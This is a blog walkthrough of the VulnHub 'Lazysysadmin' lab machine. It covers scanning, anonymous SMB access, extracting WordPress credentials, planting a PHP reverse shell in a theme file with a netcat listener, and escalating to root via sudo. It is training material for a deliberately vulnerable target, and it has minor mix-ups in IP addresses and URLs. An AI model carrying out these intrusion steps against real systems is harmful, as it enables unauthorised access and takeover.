Lazysysadmin: 1|| VulnHub Walkthrough


Hello everyone! Welcome to my new video. Today, we're exploring a vulnerable machine called "Lazysysadmin". This machine is part of a single series on VulnHub, rated as Easy in terms of difficulty.

To get started, head over to the VulnHub website and download the vulnerable image for "Lazysysadmin". 


If you're new to VulnHub, be sure to check out our VulnHub playlist for helpful videos that will guide you through the process. 

Vulhub: Vulnerable by Design

Vulhub provides a collection of pre-built vulnerable docker environments, designed for learning and practicing security vulnerability assessments and penetration testing. Explore various scenarios and improve your cybersecurity skills.


Let's dive in and see how we can exploit this machine!

 

Settings Up

Once you've downloaded the image, the next step is setting up the server in VirtualBox. 

The downloaded image is in the form of a ZIP file , so the process involves extracting the ZIP file and installing it by creating a new VM.

First, we need to extract the ZIP file using WinRAR . After extraction, I discovered several helpful files, including the VMDK files

Our next step involves creating a new virtual machine.

In VirtualBox, click on " New " to create a new VM. 

Name it " Lazysysadmin " and select the operating system type as Linux . Set the version to " Other Linux 64-bit " since we are unsure of the exact distribution. 

Proceed by allocating RAM for your VM and click " Next ." 

Select " Use an existing virtual hard disk file " and import the VMDK file extracted earlier.

After clicking "Next," click on "Finish" to complete the setup. 

Once the import is finished, you'll see the " Lazysysadmin " vulnerable machine in the VirtualBox manager. For better organization, let me regroup it into the VulnHub group.

Now, change the Network adapter to " Host-Only ." 

It's important to ensure that both your Kali Linux machine (used for attacks) and the vulnerable machine are connected to the same network, so make sure they're both connected via the host-only adapter.

Next, attempt to start the VM to check if it works. Finally, you'll notice that our vulnerable machine is ready, with a login prompt awaiting. 

Let's dive into the fun!


Enumeration

Identify the IP address

The initial step in our attack is enumeration, which involves identifying the IP address of our target machine using NetDiscover. To execute this, open a terminal and run "netdiscover -i" followed by specifying the network interface name, which in this case is " eth1."

┌──(kali㉿kali)-[~]
└─$ sudo netdiscover -i eth1

 Currently scanning: 192.168.101.0/16   |   Screen View: Unique Hosts                                                                 
                                                                                                                                      
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                      
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.95.1    0a:00:27:00:00:0d      1      60  Unknown vendor                                                                     
 192.168.95.2    08:00:27:93:73:9c      1      60  PCS Systemtechnik GmbH                                                             
  192.168.95.23   08:00:27:7c:c8:f5      1      60  PCS Systemtechnik GmbH     

From the scan results, we've obtained our target IP address: " 192.168.95.22 ."


Conduct a network scan to identify open ports

Next, we'll conduct a network scan to identify open ports, a crucial step in the enumeration process. This helps us understand the attack surface and strategize targeted attacks. We'll use the popular Nmap tool for this task. Run:

nmap -sC -sV {Specify the IP address}

In this command, 

  • " -sC " is used to perform a script scan using the default set of scripts, 
  • while " -sV " enables version detection, allowing us to identify which versions are running on which port.

┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV 192.168.95.23
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-25 16:06 IST
Nmap scan report for 192.168.95.23
Host is up (0.0014s latency).
Not shown: 994 closed tcp ports (conn-refused)
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 b5:38:66:0f:a1:ee:cd:41:69:3b:82:cf:ad:a1:f7:13 (DSA)
|   2048 58:5a:63:69:d0:da:dd:51:cc:c1:6e:00:fd:7e:61:d0 (RSA)
|   256 61:30:f3:55:1a:0d:de:c8:6a:59:5b:c9:9c:b4:92:04 (ECDSA)
|_  256 1f:65:c0:dd:15:e6:e4:21:f2:c1:9b:a3:b6:55:a0:45 (ED25519)
80/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 4 disallowed entries 
|_/old/ /test/ /TR2/ /Backnode_files/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Backnode
|_http-generator: Silex v2.2.7
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL (unauthorized)
6667/tcp open  irc         InspIRCd
| irc-info: 
|   server: Admin.local
|   users: 1
|   servers: 1
|   chans: 0
|   lusers: 1
|   lservers: 0
|   source ident: nmap
|   source host: 192.168.95.3
|_  error: Closing link: ([email protected]) [Client exited]
Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-time: 
|   date: 2024-05-25T10:36:13
|_  start_date: N/A
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: lazysysadmin
|   NetBIOS computer name: LAZYSYSADMIN\x00
|   Domain name: \x00
|   FQDN: lazysysadmin
|_  System time: 2024-05-25T20:36:13+10:00
|_nbstat: NetBIOS name: LAZYSYSADMIN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_clock-skew: mean: -3h20m00s, deviation: 5h46m24s, median: 0s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.75 seconds
                                                                                                                                       
┌──(kali㉿kali)-[~]
└─$ 

After completing the network scan, several open ports with corresponding services were revealed:

  • Port 22 (TCP): Running an SSH Secure Shell service version 6.6.1 on Ubuntu. With valid credentials, we can easily log into the target server.
  • Port 80 (TCP): Running an HTTP web server service using Apache httpd version 2.4.7. Additional details include the server title ("Backnode") and the software used to generate the web pages (" Silex v2.2.7 ").
  • Ports 139 and 445 (TCP): Running NetBIOS nameservice (Samba) version 4.3.11. These ports are commonly used for file and printer sharing in Windows environments.
  • Port 3306 (TCP): Running a MySQL database service. The service is running, but it's unclear whether it's password-protected.
  • Port 6667 (TCP): Running an IRC service (chat application) with InspIRCd server. Information about the server and a single connected user is provided.

We should take advantage of these ports to gain a foothold on the server. Before doing so, let's enumerate these ports further to find potential clues or vulnerabilities.

Among these open ports, I find  SMB ports 139 and 445, and  HTTP port 80  quite interesting. 


Enumerating SMB Service

Let's enumerate these ports to find potential clues or vulnerabilities, starting with the SMB ports.

SMB (Server Message Block) ports are often used for file sharing and can sometimes reveal sensitive information or allow access to files. In some cases, developers might mistakenly leave these ports unprotected, allowing access without a password.

First, let's list the available shares on the SMB server. 

┌──(kali㉿kali)-[~]
└─$ smbclient -L 192.168.95.23 -N        

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        share$          Disk      Sumshare
        IPC$            IPC       IPC Service (Web server)
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            LAZYSYSADMIN
                                                                                                                                       
┌──(kali㉿kali)-[~]
└─$ 

This will display various shared resources. Among these, I noticed a " share $ " share that looks interesting and might contain useful files.

Next, we will connect to the " share $ " resource on the target server to retrieve the files and directories. 

┌──(kali㉿kali)-[~]
└─$ smbclient '//192.168.95.23/share$' -N
Try "help" to get a list of possible commands.
smb: \> ls 
  .                                   D        0  Tue Aug 15 16:35:52 2017
  ..                                  D        0  Mon Aug 14 18:04:47 2017
  wordpress                           D        0  Tue Aug 15 16:51:08 2017
  Backnode_files                      D        0  Mon Aug 14 17:38:26 2017
  wp                                  D        0  Tue Aug 15 16:21:23 2017
  deets.txt                           N      139  Mon Aug 14 17:50:05 2017
  robots.txt                          N       92  Mon Aug 14 18:06:14 2017
  todolist.txt                        N       79  Mon Aug 14 18:09:56 2017
  apache                              D        0  Mon Aug 14 18:05:19 2017
  index.html                          N    36072  Sun Aug  6 10:32:15 2017
  info.php                            N       20  Tue Aug 15 16:25:19 2017
  test                                D        0  Mon Aug 14 18:05:10 2017
  old                                 D        0  Mon Aug 14 18:05:13 2017

                3029776 blocks of size 1024. 1457000 blocks available
smb: \>

Upon a successful connection, several directories and files are listed, including: 

  • wordpress
  • Backnode_files
  • wp
  • deets.txt
  • robots.txt
  • todolist.txt ,
  • apache
  • index.html
  • info.php , test , and 
  • old .

Upon careful analysis, it appears these files and directories constitute the default HTTP directory path of the target system. The presence of a directory named " WordPress " suggests that the target server may host a WordPress CMS.

To confirm this assumption, let's explore the content of the website running on Port 80. 


Web Enumeration and Directory-busting

Open a web browser of your choice and navigate to the target's IP address in the URL bar at the top of the window. 

Upon exploring the website, it looks like a default page of BackNode , which doesn't provide any clues. However, this does confirm that the SMB file share, we connected, matches the website's file structure.

To gather more information, we will use a directory-busting tool to enumerate the directories on the web server and compare these with the files and directories listed in the SMB share. This will help us identify any discrepancies or additional information. For this task, I am going to use Gobuster .

┌──(kali㉿kali)-[~]
└─$ gobuster dir -u http://192.168.95.22/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.95.22/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/wordpress             (Status: 301) [Size: 317] [--> http://192.168.95.22/wordpress/]
/test                  (Status: 301) [Size: 312] [--> http://192.168.95.22/test/]
/wp                    (Status: 301) [Size: 310] [--> http://192.168.95.22/wp/]
/apache                (Status: 301) [Size: 314] [--> http://192.168.95.22/apache/]
/old                   (Status: 301) [Size: 311] [--> http://192.168.95.22/old/]
/javascript            (Status: 301) [Size: 318] [--> http://192.168.95.22/javascript/]
/phpmyadmin            (Status: 301) [Size: 318] [--> http://192.168.95.22/phpmyadmin/]
Progress: 87664/87665 (100.00%)
===============================================================
Finished
===============================================================
                                                                                                                           
┌──(kali㉿kali)-[~]
└─$ 

After analyzing the output, my assumption was confirmed. 


WordPress Database Enumeration

Now, let's look at the content of the " WordPress " directory. 

Continue our enumeration from where we left off with the SMB content. Navigate to the " WordPress " directory and list its contents.

smb: \> cd wordpress\
smb: \wordpress\> ls
  .                                   D        0  Tue Aug 15 16:51:08 2017                                                              
  ..                                  D        0  Tue Aug 15 16:35:52 2017                                                              
  wp-config-sample.php                N     2853  Wed Dec 16 15:28:26 2015                                                              
  wp-trackback.php                    N     4513  Sat Oct 15 01:09:28 2016                                                              
  wp-admin                            D        0  Thu Aug  3 02:32:02 2017                                                              
  wp-settings.php                     N    16200  Thu Apr  6 23:31:42 2017                                                              
  wp-blog-header.php                  N      364  Sat Dec 19 16:50:28 2015                                                              
  index.php                           N      418  Wed Sep 25 05:48:11 2013                                                              
  wp-cron.php                         N     3286  Sun May 24 22:56:25 2015                                                              
  wp-links-opml.php                   N     2422  Mon Nov 21 08:16:30 2016                                                              
  readme.html                         N     7413  Mon Dec 12 13:31:39 2016                                                              
  wp-signup.php                       N    29924  Tue Jan 24 16:38:42 2017                                                              
  wp-content                          D        0  Mon Aug 21 15:37:27 2017                                                              
  license.txt                         N    19935  Mon Jan  2 23:28:42 2017                                                              
  wp-mail.php                         N     8048  Wed Jan 11 10:43:43 2017                                                              
  wp-activate.php                     N     5447  Wed Sep 28 03:06:28 2016                                                              
  .htaccess                           H       35  Tue Aug 15 17:10:13 2017                                                              
  xmlrpc.php                          N     3065  Wed Aug 31 22:01:29 2016                                                              
  wp-login.php                        N    34327  Fri May 12 22:42:46 2017                                                              
  wp-load.php                         N     3301  Tue Oct 25 08:45:30 2016                                                              
  wp-comments-post.php                N     1627  Mon Aug 29 17:30:32 2016
  wp-config.php                       N     3703  Mon Aug 21 14:55:14 2017
  wp-includes                         D        0  Thu Aug  3 02:32:03 2017

                3029776 blocks of size 1024. 1460124 blocks available
smb: \wordpress\>

Several WordPress-related files are listed, including "wp-config.php"

The wp-config.php file is particularly interesting because it typically contains database credentials. 

Let's retrieve the "wp-config.php"  file using the get command. 

smb: \wordpress\> get wp-config.php
getting file \wordpress\wp-config.php of size 3703 as wp-config.php (904.0 KiloBytes/sec) (average 904.1 KiloBytes/sec)                 
smb: \wordpress\> 

This will automatically download and save it to the /home/kali directory.

Now, let's examine the "wp-config.php"  file, which often contains database credentials and other sensitive information. 

Upon accessing it, I find the username and password. 

  • User Name: Admin
  • Password: TogieMYSQL12345^^

We can use these credentials to log in to the WordPress admin dashboard, where we can manage everything and potentially gain a foothold on the target system.


Foothold

Previously, while enumerating the File Share using an SMB client, we found the username and password. Let's use these credentials to log in.

In our browser, navigate to the wp-admin page to access the WordPress login area

http://192.168.95.22/wordpress/wp-config.php

WP-admin is the default login page for the WordPress dashboard.

Enter the retrieved credential. 

Great, we have successfully logged in to the server. 


Gain Reverse shell access from WordPress Dashboard

With access to the dashboard, we have various ways to establish a shell connection. Here, I will take advantage of modifying a PHP file in the template.

Navigate to Appearance, where you will see options related to the website's appearance. Then, Click on Editor, to edit the themes. 

The current theme in use is Twenty-fifteen. Select any PHP file to modify; I will choose:  404.php.

Clear the PHP content of the file and replace it with a PHP reverse shell script. Locate the script on your terminal and open it with a text editor like Mousepad. 

┌──(kali㉿kali)-[~]
└─$ locate php-reverse-shell
/usr/share/laudanum/php/php-reverse-shell.php
/usr/share/laudanum/wordpress/templates/php-reverse-shell.php
/usr/share/webshells/php/php-reverse-shell.php
                                                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~]
└─$ mousepad /usr/share/webshells/php/php-reverse-shell.php                                                                       

Copy the entire script and paste it into the WordPress editor

Before saving, modify the Listening Host and Listening Port

If you don't know your IP address, use the ifconfig command to check it.

Save the changes and start a listener using Netcat

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 1234
listening on [any] 1234 ...

Visit the 404 template page, to trigger the reverse shell connection

We have successfully established a shell connection.

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [192.168.95.3] from (UNKNOWN) [192.168.95.23] 54068
Linux LazySysAdmin 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:06:37 UTC 2016 i686 i686 i686 GNU/Linux
 21:32:04 up 57 min,  0 users,  load average: 0.05, 0.03, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off

Now, let's spawn an interactive shell using Python. 

$ which python
/usr/bin/python
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@LazySysAdmin:/$

It's time to check for the user flag, typically located in the home directory of the existing user. Navigate to the home directory and list the files and directories to identify the username. 

www-data@LazySysAdmin:/$ cd /home
cd /home
www-data@LazySysAdmin:/home$ ls -al
ls -al
total 12
drwxr-xr-x  3 root  root  4096 Aug 14  2017 .
drwxr-xr-x 22 root  root  4096 Aug 21  2017 ..
drwxr-xr-x  3 togie togie 4096 Aug 15  2017 togie
www-data@LazySysAdmin:/home$ 

It looks like the username of the target system is " togie ." Change to this directory and look for the flag, but there is no flag here.

www-data@LazySysAdmin:/home$ cd togie   
cd togie
www-data@LazySysAdmin:/home/togie$ ls -al
ls -al
total 24
drwxr-xr-x 3 togie togie 4096 Aug 15  2017 .
drwxr-xr-x 3 root  root  4096 Aug 14  2017 ..
-rw-r--r-- 1 togie togie  220 Aug 14  2017 .bash_logout
-rw-r--r-- 1 togie togie 3637 Aug 14  2017 .bashrc
drwx------ 2 togie togie 4096 Aug 14  2017 .cache
-rw-r--r-- 1 togie togie  675 Aug 14  2017 .profile
www-data@LazySysAdmin:/home/togie$

This suggests the flag is only in the root directory. 

www-data@LazySysAdmin:/home/togie$ cd /root
cd /root                                                                                                                                
bash: cd: /root: Permission denied                                                                                                      
www-data@LazySysAdmin:/home/togie$

Attempting to access the root directory results in a " Permission denied " error, indicating we lack the necessary rights. Let's escalate our privileges to gain access.

 

Privilege Escalation

During the privilege escalation process, our primary goal is to gather system information and identify any vulnerabilities or misconfigurations that could provide elevated privileges, ultimately allowing us to gain root access.

Previously, we found the username of the target system, " togie ." If we can find the password for this username, it may help us escalate our privileges further.

There is a file named " deets.txt " that we haven't examined yet. Let's retrieve and analyze it. 

smb: \wordpress\> cd ..                                                                                                                 
smb: \> ls                                                                                                                              
  .                                   D        0  Tue Aug 15 16:35:52 2017                                                              
  ..                                  D        0  Mon Aug 14 18:04:47 2017                                                              
  wordpress                           D        0  Tue Aug 15 16:51:08 2017                                                              
  Backnode_files                      D        0  Mon Aug 14 17:38:26 2017                                                              
  wp                                  D        0  Tue Aug 15 16:21:23 2017                                                              
  deets.txt                           N      139  Mon Aug 14 17:50:05 2017                                                              
  robots.txt                          N       92  Mon Aug 14 18:06:14 2017                                                              
  todolist.txt                        N       79  Mon Aug 14 18:09:56 2017                                                              
  apache                              D        0  Mon Aug 14 18:05:19 2017                                                              
  index.html                          N    36072  Sun Aug  6 10:32:15 2017                                                              
  info.php                            N       20  Tue Aug 15 16:25:19 2017                                                              
  test                                D        0  Mon Aug 14 18:05:10 2017                                                              
  old                                 D        0  Mon Aug 14 18:05:13 2017                                                              
                                                                                                                                        
                3029776 blocks of size 1024. 1460024 blocks available                                                                   
smb: \> get deets.txt
getting file \deets.txt of size 139 as deets.txt (67.9 KiloBytes/sec) (average 625.3 KiloBytes/sec)
smb: \> 

Now, let's open it and analyze it.

Upon analyzing the text, I found the password.


Misconfigured Sudo Permissions

Now that we have both the username and password, let's switch to the user " togie " using the su command. 

www-data@LazySysAdmin:/home/togie$ su togie                                                                                             
su togie                                                                                                                                
Password: 12345                                                                                                                          
                                                                                                                                        
togie@LazySysAdmin:~$ 

We have successfully switched to the user "togie."

Next, we need to examine the permissions assigned to users to assess their privileges on the system. This can be done by executing commands like " sudo -l " to view the commands the current user can run with elevated privileges.

togie@LazySysAdmin:~$ sudo -l                                                                                                           
sudo -l                                                                                                                                 
[sudo] password for togie: 12345                                                                                                         
                                                                                                                                        
Matching Defaults entries for togie on LazySysAdmin:                                                                                    
    env_reset, mail_badpass,                                                                                                            
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin                                                       
                                                                                                                                        
User togie may run the following commands on LazySysAdmin:                                                                              
    (ALL : ALL) ALL                                                                                                                     
togie@LazySysAdmin:~$

It appears that the user " togie " has permission to run all commands with sudo . This means we can access, modify, or do anything on the system.

Let's check the root flag to complete the session. However, it shows a restricted error again.

togie@LazySysAdmin:~$ cd /root                                                                                                          
cd /root                                                                                                                                
rbash: cd: restricted                                                                                                                   
togie@LazySysAdmin:~$ 

 To work properly, we need to run the " sudo su " command to switch to the root user and try again. 

togie@LazySysAdmin:~$ sudo su                                                                                                           
sudo su                                                                                                                                 
root@LazySysAdmin:/home/togie#

This time, it worked. 

root@LazySysAdmin:/home/togie# cd /root                                                                                                 
cd /root                                                                                                                                
root@LazySysAdmin:~# ls -al                                                                                                             
ls -al                                                                                                                                  
total 28                                                                                                                                
drwx------  3 root root 4096 Aug 15  2017 .                                                                                             
drwxr-xr-x 22 root root 4096 Aug 21  2017 ..                                                                                            
-rw-------  1 root root 1000 Aug 21  2017 .bash_history                                                                                 
-rw-r--r--  1 root root 3106 Feb 20  2014 .bashrc                                                                                       
drwx------  2 root root 4096 Aug 14  2017 .cache                                                                                        
-rw-r--r--  1 root root  140 Feb 20  2014 .profile                                                                                      
-rw-r--r--  1 root root  347 Aug 21  2017 proof.txt                                                                                     
root@LazySysAdmin:~#                                                                                                      

Upon listing the files and directories, I found the flag named " proof.txt ."

root@LazySysAdmin:~# cat proof.txt                                                                                                      
cat proof.txt                                                                                                                           
WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851                                                                                           
                                                                                                                                        
                                                                                                                                        
Well done :)                                                                                                                            
                                                                                                                                        
Hope you learn't a few things along the way.                                                                                            
                                                                                                                                        
Regards,                                                                                                                                
                                                                                                                                        
Togie Mcdogie                                                                                                                           
                                                                                                                                        
                                                                                                                                        
                                                                                                                                        
                                                                                                                                        
Enjoy some random strings                                                                                                               
                                                                                                                                        
WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851                                                                                           
2d2v#X6x9%D6!DDf4xC1ds6YdOEjug3otDmc1$#slTET7                                                                                           
pf%&1nRpaj^68ZeV2St9GkdoDkj48Fl$MI97Zt2nebt02
bhO!5Je65B6Z0bhZhQ3W64wL65wonnQ$@yw%Zhy0U19pu
root@LazySysAdmin:~#

If you have any doubts or queries, please write them in the comment section. See you then.

Tags

Post a Comment

0 Comments
* Please Don't Spam Here. All the Comments are Reviewed by Admin.

#buttons=(Ok, Go it!) #days=(20)

Our website uses cookies to enhance your experience. Learn More
Ok, Go it!